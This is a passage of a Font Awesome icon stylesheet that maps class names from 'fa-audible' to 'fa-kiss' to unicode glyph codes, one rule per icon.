  content: "\f5d2"; }

.fa-audible:before {
  content: "\f373"; }

.fa-audio-description:before {
  content: "\f29e"; }

.fa-autoprefixer:before {
  content: "\f41c"; }

.fa-avianex:before {
  content: "\f374"; }

.fa-aviato:before {
  content: "\f421"; }

.fa-award:before {
  content: "\f559"; }

.fa-aws:before {
  content: "\f375"; }

.fa-baby:before {
  content: "\f77c"; }

.fa-baby-carriage:before {
  content: "\f77d"; }

.fa-backspace:before {
  content: "\f55a"; }

.fa-backward:before {
  content: "\f04a"; }

.fa-bacon:before {
  content: "\f7e5"; }

.fa-balance-scale:before {
  content: "\f24e"; }

.fa-ban:before {
  content: "\f05e"; }

.fa-band-aid:before {
  content: "\f462"; }

.fa-bandcamp:before {
  content: "\f2d5"; }

.fa-barcode:before {
  content: "\f02a"; }

.fa-bars:before {
  content: "\f0c9"; }

.fa-baseball-ball:before {
  content: "\f433"; }

.fa-basketball-ball:before {
  content: "\f434"; }

.fa-bath:before {
  content: "\f2cd"; }

.fa-battery-empty:before {
  content: "\f244"; }

.fa-battery-full:before {
  content: "\f240"; }

.fa-battery-half:before {
  content: "\f242"; }

.fa-battery-quarter:before {
  content: "\f243"; }

.fa-battery-three-quarters:before {
  content: "\f241"; }

.fa-bed:before {
  content: "\f236"; }

.fa-beer:before {
  content: "\f0fc"; }

.fa-behance:before {
  content: "\f1b4"; }

.fa-behance-square:before {
  content: "\f1b5"; }

.fa-bell:before {
  content: "\f0f3"; }

.fa-bell-slash:before {
  content: "\f1f6"; }

.fa-bezier-curve:before {
  content: "\f55b"; }

.fa-bible:before {
  content: "\f647"; }

.fa-bicycle:before {
  content: "\f206"; }

.fa-bimobject:before {
  content: "\f378"; }

.fa-binoculars:before {
  content: "\f1e5"; }

.fa-biohazard:before {
  content: "\f780"; }

.fa-birthday-cake:before {
  content: "\f1fd"; }

.fa-bitbucket:before {
  content: "\f171"; }

.fa-bitcoin:before {
  content: "\f379"; }

.fa-bity:before {
  content: "\f37a"; }

.fa-black-tie:before {
  content: "\f27e"; }

.fa-blackberry:before {
  content: "\f37b"; }

.fa-blender:before {
  content: "\f517"; }

.fa-blender-phone:before {
  content: "\f6b6"; }

.fa-blind:before {
  content: "\f29d"; }

.fa-blog:before {
  content: "\f781"; }

.fa-blogger:before {
  content: "\f37c"; }

.fa-blogger-b:before {
  content: "\f37d"; }

.fa-bluetooth:before {
  content: "\f293"; }

.fa-bluetooth-b:before {
  content: "\f294"; }

.fa-bold:before {
  content: "\f032"; }

.fa-bolt:before {
  content: "\f0e7"; }

.fa-bomb:before {
  content: "\f1e2"; }

.fa-bone:before {
  content: "\f5d7"; }

.fa-bong:before {
  content: "\f55c"; }

.fa-book:before {
  content: "\f02d"; }

.fa-book-dead:before {
  content: "\f6b7"; }

.fa-book-medical:before {
  content: "\f7e6"; }

.fa-book-open:before {
  content: "\f518"; }

.fa-book-reader:before {
  content: "\f5da"; }

.fa-bookmark:before {
  content: "\f02e"; }

.fa-bowling-ball:before {
  content: "\f436"; }

.fa-box:before {
  content: "\f466"; }

.fa-box-open:before {
  content: "\f49e"; }

.fa-boxes:before {
  content: "\f468"; }

.fa-braille:before {
  content: "\f2a1"; }

.fa-brain:before {
  content: "\f5dc"; }

.fa-bread-slice:before {
  content: "\f7ec"; }

.fa-briefcase:before {
  content: "\f0b1"; }

.fa-briefcase-medical:before {
  content: "\f469"; }

.fa-broadcast-tower:before {
  content: "\f519"; }

.fa-broom:before {
  content: "\f51a"; }

.fa-brush:before {
  content: "\f55d"; }

.fa-btc:before {
  content: "\f15a"; }

.fa-bug:before {
  content: "\f188"; }

.fa-building:before {
  content: "\f1ad"; }

.fa-bullhorn:before {
  content: "\f0a1"; }

.fa-bullseye:before {
  content: "\f140"; }

.fa-burn:before {
  content: "\f46a"; }

.fa-buromobelexperte:before {
  content: "\f37f"; }

.fa-bus:before {
  content: "\f207"; }

.fa-bus-alt:before {
  content: "\f55e"; }

.fa-business-time:before {
  content: "\f64a"; }

.fa-buysellads:before {
  content: "\f20d"; }

.fa-calculator:before {
  content: "\f1ec"; }

.fa-calendar:before {
  content: "\f133"; }

.fa-calendar-alt:before {
  content: "\f073"; }

.fa-calendar-check:before {
  content: "\f274"; }

.fa-calendar-day:before {
  content: "\f783"; }

.fa-calendar-minus:before {
  content: "\f272"; }

.fa-calendar-plus:before {
  content: "\f271"; }

.fa-calendar-times:before {
  content: "\f273"; }

.fa-calendar-week:before {
  content: "\f784"; }

.fa-camera:before {
  content: "\f030"; }

.fa-camera-retro:before {
  content: "\f083"; }

.fa-campground:before {
  content: "\f6bb"; }

.fa-canadian-maple-leaf:before {
  content: "\f785"; }

.fa-candy-cane:before {
  content: "\f786"; }

.fa-cannabis:before {
  content: "\f55f"; }

.fa-capsules:before {
  content: "\f46b"; }

.fa-car:before {
  content: "\f1b9"; }

.fa-car-alt:before {
  content: "\f5de"; }

.fa-car-battery:before {
  content: "\f5df"; }

.fa-car-crash:before {
  content: "\f5e1"; }

.fa-car-side:before {
  content: "\f5e4"; }

.fa-caret-down:before {
  content: "\f0d7"; }

.fa-caret-left:before {
  content: "\f0d9"; }

.fa-caret-right:before {
  content: "\f0da"; }

.fa-caret-square-down:before {
  content: "\f150"; }

.fa-caret-square-left:before {
  content: "\f191"; }

.fa-caret-square-right:before {
  content: "\f152"; }

.fa-caret-square-up:before {
  content: "\f151"; }

.fa-caret-up:before {
  content: "\f0d8"; }

.fa-carrot:before {
  content: "\f787"; }

.fa-cart-arrow-down:before {
  content: "\f218"; }

.fa-cart-plus:before {
  content: "\f217"; }

.fa-cash-register:before {
  content: "\f788"; }

.fa-cat:before {
  content: "\f6be"; }

.fa-cc-amazon-pay:before {
  content: "\f42d"; }

.fa-cc-amex:before {
  content: "\f1f3"; }

.fa-cc-apple-pay:before {
  content: "\f416"; }

.fa-cc-diners-club:before {
  content: "\f24c"; }

.fa-cc-discover:before {
  content: "\f1f2"; }

.fa-cc-jcb:before {
  content: "\f24b"; }

.fa-cc-mastercard:before {
  content: "\f1f1"; }

.fa-cc-paypal:before {
  content: "\f1f4"; }

.fa-cc-stripe:before {
  content: "\f1f5"; }

.fa-cc-visa:before {
  content: "\f1f0"; }

.fa-centercode:before {
  content: "\f380"; }

.fa-centos:before {
  content: "\f789"; }

.fa-certificate:before {
  content: "\f0a3"; }

.fa-chair:before {
  content: "\f6c0"; }

.fa-chalkboard:before {
  content: "\f51b"; }

.fa-chalkboard-teacher:before {
  content: "\f51c"; }

.fa-charging-station:before {
  content: "\f5e7"; }

.fa-chart-area:before {
  content: "\f1fe"; }

.fa-chart-bar:before {
  content: "\f080"; }

.fa-chart-line:before {
  content: "\f201"; }

.fa-chart-pie:before {
  content: "\f200"; }

.fa-check:before {
  content: "\f00c"; }

.fa-check-circle:before {
  content: "\f058"; }

.fa-check-double:before {
  content: "\f560"; }

.fa-check-square:before {
  content: "\f14a"; }

.fa-cheese:before {
  content: "\f7ef"; }

.fa-chess:before {
  content: "\f439"; }

.fa-chess-bishop:before {
  content: "\f43a"; }

.fa-chess-board:before {
  content: "\f43c"; }

.fa-chess-king:before {
  content: "\f43f"; }

.fa-chess-knight:before {
  content: "\f441"; }

.fa-chess-pawn:before {
  content: "\f443"; }

.fa-chess-queen:before {
  content: "\f445"; }

.fa-chess-rook:before {
  content: "\f447"; }

.fa-chevron-circle-down:before {
  content: "\f13a"; }

.fa-chevron-circle-left:before {
  content: "\f137"; }

.fa-chevron-circle-right:before {
  content: "\f138"; }

.fa-chevron-circle-up:before {
  content: "\f139"; }

.fa-chevron-down:before {
  content: "\f078"; }

.fa-chevron-left:before {
  content: "\f053"; }

.fa-chevron-right:before {
  content: "\f054"; }

.fa-chevron-up:before {
  content: "\f077"; }

.fa-child:before {
  content: "\f1ae"; }

.fa-chrome:before {
  content: "\f268"; }

.fa-church:before {
  content: "\f51d"; }

.fa-circle:before {
  content: "\f111"; }

.fa-circle-notch:before {
  content: "\f1ce"; }

.fa-city:before {
  content: "\f64f"; }

.fa-clinic-medical:before {
  content: "\f7f2"; }

.fa-clipboard:before {
  content: "\f328"; }

.fa-clipboard-check:before {
  content: "\f46c"; }

.fa-clipboard-list:before {
  content: "\f46d"; }

.fa-clock:before {
  content: "\f017"; }

.fa-clone:before {
  content: "\f24d"; }

.fa-closed-captioning:before {
  content: "\f20a"; }

.fa-cloud:before {
  content: "\f0c2"; }

.fa-cloud-download-alt:before {
  content: "\f381"; }

.fa-cloud-meatball:before {
  content: "\f73b"; }

.fa-cloud-moon:before {
  content: "\f6c3"; }

.fa-cloud-moon-rain:before {
  content: "\f73c"; }

.fa-cloud-rain:before {
  content: "\f73d"; }

.fa-cloud-showers-heavy:before {
  content: "\f740"; }

.fa-cloud-sun:before {
  content: "\f6c4"; }

.fa-cloud-sun-rain:before {
  content: "\f743"; }

.fa-cloud-upload-alt:before {
  content: "\f382"; }

.fa-cloudscale:before {
  content: "\f383"; }

.fa-cloudsmith:before {
  content: "\f384"; }

.fa-cloudversify:before {
  content: "\f385"; }

.fa-cocktail:before {
  content: "\f561"; }

.fa-code:before {
  content: "\f121"; }

.fa-code-branch:before {
  content: "\f126"; }

.fa-codepen:before {
  content: "\f1cb"; }

.fa-codiepie:before {
  content: "\f284"; }

.fa-coffee:before {
  content: "\f0f4"; }

.fa-cog:before {
  content: "\f013"; }

.fa-cogs:before {
  content: "\f085"; }

.fa-coins:before {
  content: "\f51e"; }

.fa-columns:before {
  content: "\f0db"; }

.fa-comment:before {
  content: "\f075"; }

.fa-comment-alt:before {
  content: "\f27a"; }

.fa-comment-dollar:before {
  content: "\f651"; }

.fa-comment-dots:before {
  content: "\f4ad"; }

.fa-comment-medical:before {
  content: "\f7f5"; }

.fa-comment-slash:before {
  content: "\f4b3"; }

.fa-comments:before {
  content: "\f086"; }

.fa-comments-dollar:before {
  content: "\f653"; }

.fa-compact-disc:before {
  content: "\f51f"; }

.fa-compass:before {
  content: "\f14e"; }

.fa-compress:before {
  content: "\f066"; }

.fa-compress-arrows-alt:before {
  content: "\f78c"; }

.fa-concierge-bell:before {
  content: "\f562"; }

.fa-confluence:before {
  content: "\f78d"; }

.fa-connectdevelop:before {
  content: "\f20e"; }

.fa-contao:before {
  content: "\f26d"; }

.fa-cookie:before {
  content: "\f563"; }

.fa-cookie-bite:before {
  content: "\f564"; }

.fa-copy:before {
  content: "\f0c5"; }

.fa-copyright:before {
  content: "\f1f9"; }

.fa-couch:before {
  content: "\f4b8"; }

.fa-cpanel:before {
  content: "\f388"; }

.fa-creative-commons:before {
  content: "\f25e"; }

.fa-creative-commons-by:before {
  content: "\f4e7"; }

.fa-creative-commons-nc:before {
  content: "\f4e8"; }

.fa-creative-commons-nc-eu:before {
  content: "\f4e9"; }

.fa-creative-commons-nc-jp:before {
  content: "\f4ea"; }

.fa-creative-commons-nd:before {
  content: "\f4eb"; }

.fa-creative-commons-pd:before {
  content: "\f4ec"; }

.fa-creative-commons-pd-alt:before {
  content: "\f4ed"; }

.fa-creative-commons-remix:before {
  content: "\f4ee"; }

.fa-creative-commons-sa:before {
  content: "\f4ef"; }

.fa-creative-commons-sampling:before {
  content: "\f4f0"; }

.fa-creative-commons-sampling-plus:before {
  content: "\f4f1"; }

.fa-creative-commons-share:before {
  content: "\f4f2"; }

.fa-creative-commons-zero:before {
  content: "\f4f3"; }

.fa-credit-card:before {
  content: "\f09d"; }

.fa-critical-role:before {
  content: "\f6c9"; }

.fa-crop:before {
  content: "\f125"; }

.fa-crop-alt:before {
  content: "\f565"; }

.fa-cross:before {
  content: "\f654"; }

.fa-crosshairs:before {
  content: "\f05b"; }

.fa-crow:before {
  content: "\f520"; }

.fa-crown:before {
  content: "\f521"; }

.fa-crutch:before {
  content: "\f7f7"; }

.fa-css3:before {
  content: "\f13c"; }

.fa-css3-alt:before {
  content: "\f38b"; }

.fa-cube:before {
  content: "\f1b2"; }

.fa-cubes:before {
  content: "\f1b3"; }

.fa-cut:before {
  content: "\f0c4"; }

.fa-cuttlefish:before {
  content: "\f38c"; }

.fa-d-and-d:before {
  content: "\f38d"; }

.fa-d-and-d-beyond:before {
  content: "\f6ca"; }

.fa-dashcube:before {
  content: "\f210"; }

.fa-database:before {
  content: "\f1c0"; }

.fa-deaf:before {
  content: "\f2a4"; }

.fa-delicious:before {
  content: "\f1a5"; }

.fa-democrat:before {
  content: "\f747"; }

.fa-deploydog:before {
  content: "\f38e"; }

.fa-deskpro:before {
  content: "\f38f"; }

.fa-desktop:before {
  content: "\f108"; }

.fa-dev:before {
  content: "\f6cc"; }

.fa-deviantart:before {
  content: "\f1bd"; }

.fa-dharmachakra:before {
  content: "\f655"; }

.fa-dhl:before {
  content: "\f790"; }

.fa-diagnoses:before {
  content: "\f470"; }

.fa-diaspora:before {
  content: "\f791"; }

.fa-dice:before {
  content: "\f522"; }

.fa-dice-d20:before {
  content: "\f6cf"; }

.fa-dice-d6:before {
  content: "\f6d1"; }

.fa-dice-five:before {
  content: "\f523"; }

.fa-dice-four:before {
  content: "\f524"; }

.fa-dice-one:before {
  content: "\f525"; }

.fa-dice-six:before {
  content: "\f526"; }

.fa-dice-three:before {
  content: "\f527"; }

.fa-dice-two:before {
  content: "\f528"; }

.fa-digg:before {
  content: "\f1a6"; }

.fa-digital-ocean:before {
  content: "\f391"; }

.fa-digital-tachograph:before {
  content: "\f566"; }

.fa-directions:before {
  content: "\f5eb"; }

.fa-discord:before {
  content: "\f392"; }

.fa-discourse:before {
  content: "\f393"; }

.fa-divide:before {
  content: "\f529"; }

.fa-dizzy:before {
  content: "\f567"; }

.fa-dna:before {
  content: "\f471"; }

.fa-dochub:before {
  content: "\f394"; }

.fa-docker:before {
  content: "\f395"; }

.fa-dog:before {
  content: "\f6d3"; }

.fa-dollar-sign:before {
  content: "\f155"; }

.fa-dolly:before {
  content: "\f472"; }

.fa-dolly-flatbed:before {
  content: "\f474"; }

.fa-donate:before {
  content: "\f4b9"; }

.fa-door-closed:before {
  content: "\f52a"; }

.fa-door-open:before {
  content: "\f52b"; }

.fa-dot-circle:before {
  content: "\f192"; }

.fa-dove:before {
  content: "\f4ba"; }

.fa-download:before {
  content: "\f019"; }

.fa-draft2digital:before {
  content: "\f396"; }

.fa-drafting-compass:before {
  content: "\f568"; }

.fa-dragon:before {
  content: "\f6d5"; }

.fa-draw-polygon:before {
  content: "\f5ee"; }

.fa-dribbble:before {
  content: "\f17d"; }

.fa-dribbble-square:before {
  content: "\f397"; }

.fa-dropbox:before {
  content: "\f16b"; }

.fa-drum:before {
  content: "\f569"; }

.fa-drum-steelpan:before {
  content: "\f56a"; }

.fa-drumstick-bite:before {
  content: "\f6d7"; }

.fa-drupal:before {
  content: "\f1a9"; }

.fa-dumbbell:before {
  content: "\f44b"; }

.fa-dumpster:before {
  content: "\f793"; }

.fa-dumpster-fire:before {
  content: "\f794"; }

.fa-dungeon:before {
  content: "\f6d9"; }

.fa-dyalog:before {
  content: "\f399"; }

.fa-earlybirds:before {
  content: "\f39a"; }

.fa-ebay:before {
  content: "\f4f4"; }

.fa-edge:before {
  content: "\f282"; }

.fa-edit:before {
  content: "\f044"; }

.fa-egg:before {
  content: "\f7fb"; }

.fa-eject:before {
  content: "\f052"; }

.fa-elementor:before {
  content: "\f430"; }

.fa-ellipsis-h:before {
  content: "\f141"; }

.fa-ellipsis-v:before {
  content: "\f142"; }

.fa-ello:before {
  content: "\f5f1"; }

.fa-ember:before {
  content: "\f423"; }

.fa-empire:before {
  content: "\f1d1"; }

.fa-envelope:before {
  content: "\f0e0"; }

.fa-envelope-open:before {
  content: "\f2b6"; }

.fa-envelope-open-text:before {
  content: "\f658"; }

.fa-envelope-square:before {
  content: "\f199"; }

.fa-envira:before {
  content: "\f299"; }

.fa-equals:before {
  content: "\f52c"; }

.fa-eraser:before {
  content: "\f12d"; }

.fa-erlang:before {
  content: "\f39d"; }

.fa-ethereum:before {
  content: "\f42e"; }

.fa-ethernet:before {
  content: "\f796"; }

.fa-etsy:before {
  content: "\f2d7"; }

.fa-euro-sign:before {
  content: "\f153"; }

.fa-exchange-alt:before {
  content: "\f362"; }

.fa-exclamation:before {
  content: "\f12a"; }

.fa-exclamation-circle:before {
  content: "\f06a"; }

.fa-exclamation-triangle:before {
  content: "\f071"; }

.fa-expand:before {
  content: "\f065"; }

.fa-expand-arrows-alt:before {
  content: "\f31e"; }

.fa-expeditedssl:before {
  content: "\f23e"; }

.fa-external-link-alt:before {
  content: "\f35d"; }

.fa-external-link-square-alt:before {
  content: "\f360"; }

.fa-eye:before {
  content: "\f06e"; }

.fa-eye-dropper:before {
  content: "\f1fb"; }

.fa-eye-slash:before {
  content: "\f070"; }

.fa-facebook:before {
  content: "\f09a"; }

.fa-facebook-f:before {
  content: "\f39e"; }

.fa-facebook-messenger:before {
  content: "\f39f"; }

.fa-facebook-square:before {
  content: "\f082"; }

.fa-fantasy-flight-games:before {
  content: "\f6dc"; }

.fa-fast-backward:before {
  content: "\f049"; }

.fa-fast-forward:before {
  content: "\f050"; }

.fa-fax:before {
  content: "\f1ac"; }

.fa-feather:before {
  content: "\f52d"; }

.fa-feather-alt:before {
  content: "\f56b"; }

.fa-fedex:before {
  content: "\f797"; }

.fa-fedora:before {
  content: "\f798"; }

.fa-female:before {
  content: "\f182"; }

.fa-fighter-jet:before {
  content: "\f0fb"; }

.fa-figma:before {
  content: "\f799"; }

.fa-file:before {
  content: "\f15b"; }

.fa-file-alt:before {
  content: "\f15c"; }

.fa-file-archive:before {
  content: "\f1c6"; }

.fa-file-audio:before {
  content: "\f1c7"; }

.fa-file-code:before {
  content: "\f1c9"; }

.fa-file-contract:before {
  content: "\f56c"; }

.fa-file-csv:before {
  content: "\f6dd"; }

.fa-file-download:before {
  content: "\f56d"; }

.fa-file-excel:before {
  content: "\f1c3"; }

.fa-file-export:before {
  content: "\f56e"; }

.fa-file-image:before {
  content: "\f1c5"; }

.fa-file-import:before {
  content: "\f56f"; }

.fa-file-invoice:before {
  content: "\f570"; }

.fa-file-invoice-dollar:before {
  content: "\f571"; }

.fa-file-medical:before {
  content: "\f477"; }

.fa-file-medical-alt:before {
  content: "\f478"; }

.fa-file-pdf:before {
  content: "\f1c1"; }

.fa-file-powerpoint:before {
  content: "\f1c4"; }

.fa-file-prescription:before {
  content: "\f572"; }

.fa-file-signature:before {
  content: "\f573"; }

.fa-file-upload:before {
  content: "\f574"; }

.fa-file-video:before {
  content: "\f1c8"; }

.fa-file-word:before {
  content: "\f1c2"; }

.fa-fill:before {
  content: "\f575"; }

.fa-fill-drip:before {
  content: "\f576"; }

.fa-film:before {
  content: "\f008"; }

.fa-filter:before {
  content: "\f0b0"; }

.fa-fingerprint:before {
  content: "\f577"; }

.fa-fire:before {
  content: "\f06d"; }

.fa-fire-alt:before {
  content: "\f7e4"; }

.fa-fire-extinguisher:before {
  content: "\f134"; }

.fa-firefox:before {
  content: "\f269"; }

.fa-first-aid:before {
  content: "\f479"; }

.fa-first-order:before {
  content: "\f2b0"; }

.fa-first-order-alt:before {
  content: "\f50a"; }

.fa-firstdraft:before {
  content: "\f3a1"; }

.fa-fish:before {
  content: "\f578"; }

.fa-fist-raised:before {
  content: "\f6de"; }

.fa-flag:before {
  content: "\f024"; }

.fa-flag-checkered:before {
  content: "\f11e"; }

.fa-flag-usa:before {
  content: "\f74d"; }

.fa-flask:before {
  content: "\f0c3"; }

.fa-flickr:before {
  content: "\f16e"; }

.fa-flipboard:before {
  content: "\f44d"; }

.fa-flushed:before {
  content: "\f579"; }

.fa-fly:before {
  content: "\f417"; }

.fa-folder:before {
  content: "\f07b"; }

.fa-folder-minus:before {
  content: "\f65d"; }

.fa-folder-open:before {
  content: "\f07c"; }

.fa-folder-plus:before {
  content: "\f65e"; }

.fa-font:before {
  content: "\f031"; }

.fa-font-awesome:before {
  content: "\f2b4"; }

.fa-font-awesome-alt:before {
  content: "\f35c"; }

.fa-font-awesome-flag:before {
  content: "\f425"; }

.fa-font-awesome-logo-full:before {
  content: "\f4e6"; }

.fa-fonticons:before {
  content: "\f280"; }

.fa-fonticons-fi:before {
  content: "\f3a2"; }

.fa-football-ball:before {
  content: "\f44e"; }

.fa-fort-awesome:before {
  content: "\f286"; }

.fa-fort-awesome-alt:before {
  content: "\f3a3"; }

.fa-forumbee:before {
  content: "\f211"; }

.fa-forward:before {
  content: "\f04e"; }

.fa-foursquare:before {
  content: "\f180"; }

.fa-free-code-camp:before {
  content: "\f2c5"; }

.fa-freebsd:before {
  content: "\f3a4"; }

.fa-frog:before {
  content: "\f52e"; }

.fa-frown:before {
  content: "\f119"; }

.fa-frown-open:before {
  content: "\f57a"; }

.fa-fulcrum:before {
  content: "\f50b"; }

.fa-funnel-dollar:before {
  content: "\f662"; }

.fa-futbol:before {
  content: "\f1e3"; }

.fa-galactic-republic:before {
  content: "\f50c"; }

.fa-galactic-senate:before {
  content: "\f50d"; }

.fa-gamepad:before {
  content: "\f11b"; }

.fa-gas-pump:before {
  content: "\f52f"; }

.fa-gavel:before {
  content: "\f0e3"; }

.fa-gem:before {
  content: "\f3a5"; }

.fa-genderless:before {
  content: "\f22d"; }

.fa-get-pocket:before {
  content: "\f265"; }

.fa-gg:before {
  content: "\f260"; }

.fa-gg-circle:before {
  content: "\f261"; }

.fa-ghost:before {
  content: "\f6e2"; }

.fa-gift:before {
  content: "\f06b"; }

.fa-gifts:before {
  content: "\f79c"; }

.fa-git:before {
  content: "\f1d3"; }

.fa-git-square:before {
  content: "\f1d2"; }

.fa-github:before {
  content: "\f09b"; }

.fa-github-alt:before {
  content: "\f113"; }

.fa-github-square:before {
  content: "\f092"; }

.fa-gitkraken:before {
  content: "\f3a6"; }

.fa-gitlab:before {
  content: "\f296"; }

.fa-gitter:before {
  content: "\f426"; }

.fa-glass-cheers:before {
  content: "\f79f"; }

.fa-glass-martini:before {
  content: "\f000"; }

.fa-glass-martini-alt:before {
  content: "\f57b"; }

.fa-glass-whiskey:before {
  content: "\f7a0"; }

.fa-glasses:before {
  content: "\f530"; }

.fa-glide:before {
  content: "\f2a5"; }

.fa-glide-g:before {
  content: "\f2a6"; }

.fa-globe:before {
  content: "\f0ac"; }

.fa-globe-africa:before {
  content: "\f57c"; }

.fa-globe-americas:before {
  content: "\f57d"; }

.fa-globe-asia:before {
  content: "\f57e"; }

.fa-globe-europe:before {
  content: "\f7a2"; }

.fa-gofore:before {
  content: "\f3a7"; }

.fa-golf-ball:before {
  content: "\f450"; }

.fa-goodreads:before {
  content: "\f3a8"; }

.fa-goodreads-g:before {
  content: "\f3a9"; }

.fa-google:before {
  content: "\f1a0"; }

.fa-google-drive:before {
  content: "\f3aa"; }

.fa-google-play:before {
  content: "\f3ab"; }

.fa-google-plus:before {
  content: "\f2b3"; }

.fa-google-plus-g:before {
  content: "\f0d5"; }

.fa-google-plus-square:before {
  content: "\f0d4"; }

.fa-google-wallet:before {
  content: "\f1ee"; }

.fa-gopuram:before {
  content: "\f664"; }

.fa-graduation-cap:before {
  content: "\f19d"; }

.fa-gratipay:before {
  content: "\f184"; }

.fa-grav:before {
  content: "\f2d6"; }

.fa-greater-than:before {
  content: "\f531"; }

.fa-greater-than-equal:before {
  content: "\f532"; }

.fa-grimace:before {
  content: "\f57f"; }

.fa-grin:before {
  content: "\f580"; }

.fa-grin-alt:before {
  content: "\f581"; }

.fa-grin-beam:before {
  content: "\f582"; }

.fa-grin-beam-sweat:before {
  content: "\f583"; }

.fa-grin-hearts:before {
  content: "\f584"; }

.fa-grin-squint:before {
  content: "\f585"; }

.fa-grin-squint-tears:before {
  content: "\f586"; }

.fa-grin-stars:before {
  content: "\f587"; }

.fa-grin-tears:before {
  content: "\f588"; }

.fa-grin-tongue:before {
  content: "\f589"; }

.fa-grin-tongue-squint:before {
  content: "\f58a"; }

.fa-grin-tongue-wink:before {
  content: "\f58b"; }

.fa-grin-wink:before {
  content: "\f58c"; }

.fa-grip-horizontal:before {
  content: "\f58d"; }

.fa-grip-lines:before {
  content: "\f7a4"; }

.fa-grip-lines-vertical:before {
  content: "\f7a5"; }

.fa-grip-vertical:before {
  content: "\f58e"; }

.fa-gripfire:before {
  content: "\f3ac"; }

.fa-grunt:before {
  content: "\f3ad"; }

.fa-guitar:before {
  content: "\f7a6"; }

.fa-gulp:before {
  content: "\f3ae"; }

.fa-h-square:before {
  content: "\f0fd"; }

.fa-hacker-news:before {
  content: "\f1d4"; }

.fa-hacker-news-square:before {
  content: "\f3af"; }

.fa-hackerrank:before {
  content: "\f5f7"; }

.fa-hamburger:before {
  content: "\f805"; }

.fa-hammer:before {
  content: "\f6e3"; }

.fa-hamsa:before {
  content: "\f665"; }

.fa-hand-holding:before {
  content: "\f4bd"; }

.fa-hand-holding-heart:before {
  content: "\f4be"; }

.fa-hand-holding-usd:before {
  content: "\f4c0"; }

.fa-hand-lizard:before {
  content: "\f258"; }

.fa-hand-middle-finger:before {
  content: "\f806"; }

.fa-hand-paper:before {
  content: "\f256"; }

.fa-hand-peace:before {
  content: "\f25b"; }

.fa-hand-point-down:before {
  content: "\f0a7"; }

.fa-hand-point-left:before {
  content: "\f0a5"; }

.fa-hand-point-right:before {
  content: "\f0a4"; }

.fa-hand-point-up:before {
  content: "\f0a6"; }

.fa-hand-pointer:before {
  content: "\f25a"; }

.fa-hand-rock:before {
  content: "\f255"; }

.fa-hand-scissors:before {
  content: "\f257"; }

.fa-hand-spock:before {
  content: "\f259"; }

.fa-hands:before {
  content: "\f4c2"; }

.fa-hands-helping:before {
  content: "\f4c4"; }

.fa-handshake:before {
  content: "\f2b5"; }

.fa-hanukiah:before {
  content: "\f6e6"; }

.fa-hard-hat:before {
  content: "\f807"; }

.fa-hashtag:before {
  content: "\f292"; }

.fa-hat-wizard:before {
  content: "\f6e8"; }

.fa-haykal:before {
  content: "\f666"; }

.fa-hdd:before {
  content: "\f0a0"; }

.fa-heading:before {
  content: "\f1dc"; }

.fa-headphones:before {
  content: "\f025"; }

.fa-headphones-alt:before {
  content: "\f58f"; }

.fa-headset:before {
  content: "\f590"; }

.fa-heart:before {
  content: "\f004"; }

.fa-heart-broken:before {
  content: "\f7a9"; }

.fa-heartbeat:before {
  content: "\f21e"; }

.fa-helicopter:before {
  content: "\f533"; }

.fa-highlighter:before {
  content: "\f591"; }

.fa-hiking:before {
  content: "\f6ec"; }

.fa-hippo:before {
  content: "\f6ed"; }

.fa-hips:before {
  content: "\f452"; }

.fa-hire-a-helper:before {
  content: "\f3b0"; }

.fa-history:before {
  content: "\f1da"; }

.fa-hockey-puck:before {
  content: "\f453"; }

.fa-holly-berry:before {
  content: "\f7aa"; }

.fa-home:before {
  content: "\f015"; }

.fa-hooli:before {
  content: "\f427"; }

.fa-hornbill:before {
  content: "\f592"; }

.fa-horse:before {
  content: "\f6f0"; }

.fa-horse-head:before {
  content: "\f7ab"; }

.fa-hospital:before {
  content: "\f0f8"; }

.fa-hospital-alt:before {
  content: "\f47d"; }

.fa-hospital-symbol:before {
  content: "\f47e"; }

.fa-hot-tub:before {
  content: "\f593"; }

.fa-hotdog:before {
  content: "\f80f"; }

.fa-hotel:before {
  content: "\f594"; }

.fa-hotjar:before {
  content: "\f3b1"; }

.fa-hourglass:before {
  content: "\f254"; }

.fa-hourglass-end:before {
  content: "\f253"; }

.fa-hourglass-half:before {
  content: "\f252"; }

.fa-hourglass-start:before {
  content: "\f251"; }

.fa-house-damage:before {
  content: "\f6f1"; }

.fa-houzz:before {
  content: "\f27c"; }

.fa-hryvnia:before {
  content: "\f6f2"; }

.fa-html5:before {
  content: "\f13b"; }

.fa-hubspot:before {
  content: "\f3b2"; }

.fa-i-cursor:before {
  content: "\f246"; }

.fa-ice-cream:before {
  content: "\f810"; }

.fa-icicles:before {
  content: "\f7ad"; }

.fa-id-badge:before {
  content: "\f2c1"; }

.fa-id-card:before {
  content: "\f2c2"; }

.fa-id-card-alt:before {
  content: "\f47f"; }

.fa-igloo:before {
  content: "\f7ae"; }

.fa-image:before {
  content: "\f03e"; }

.fa-images:before {
  content: "\f302"; }

.fa-imdb:before {
  content: "\f2d8"; }

.fa-inbox:before {
  content: "\f01c"; }

.fa-indent:before {
  content: "\f03c"; }

.fa-industry:before {
  content: "\f275"; }

.fa-infinity:before {
  content: "\f534"; }

.fa-info:before {
  content: "\f129"; }

.fa-info-circle:before {
  content: "\f05a"; }

.fa-instagram:before {
  content: "\f16d"; }

.fa-intercom:before {
  content: "\f7af"; }

.fa-internet-explorer:before {
  content: "\f26b"; }

.fa-invision:before {
  content: "\f7b0"; }

.fa-ioxhost:before {
  content: "\f208"; }

.fa-italic:before {
  content: "\f033"; }

.fa-itunes:before {
  content: "\f3b4"; }

.fa-itunes-note:before {
  content: "\f3b5"; }

.fa-java:before {
  content: "\f4e4"; }

.fa-jedi:before {
  content: "\f669"; }

.fa-jedi-order:before {
  content: "\f50e"; }

.fa-jenkins:before {
  content: "\f3b6"; }

.fa-jira:before {
  content: "\f7b1"; }

.fa-joget:before {
  content: "\f3b7"; }

.fa-joint:before {
  content: "\f595"; }

.fa-joomla:before {
  content: "\f1aa"; }

.fa-journal-whills:before {
  content: "\f66a"; }

.fa-js:before {
  content: "\f3b8"; }

.fa-js-square:before {
  content: "\f3b9"; }

.fa-jsfiddle:before {
  content: "\f1cc"; }

.fa-kaaba:before {
  content: "\f66b"; }

.fa-kaggle:before {
  content: "\f5fa"; }

.fa-key:before {
  content: "\f084"; }

.fa-keybase:before {
  content: "\f4f5"; }

.fa-keyboard:before {
  content: "\f11c"; }

.fa-keycdn:before {
  content: "\f3ba"; }

.fa-khanda:before {
  content: "\f66d"; }

.fa-kickstarter:before {
  content: "\f3bb"; }

.fa-kickstarter-k:before {
  content: "\f3bc"; }

.fa-kiss:before {
  content: "\f596"; }

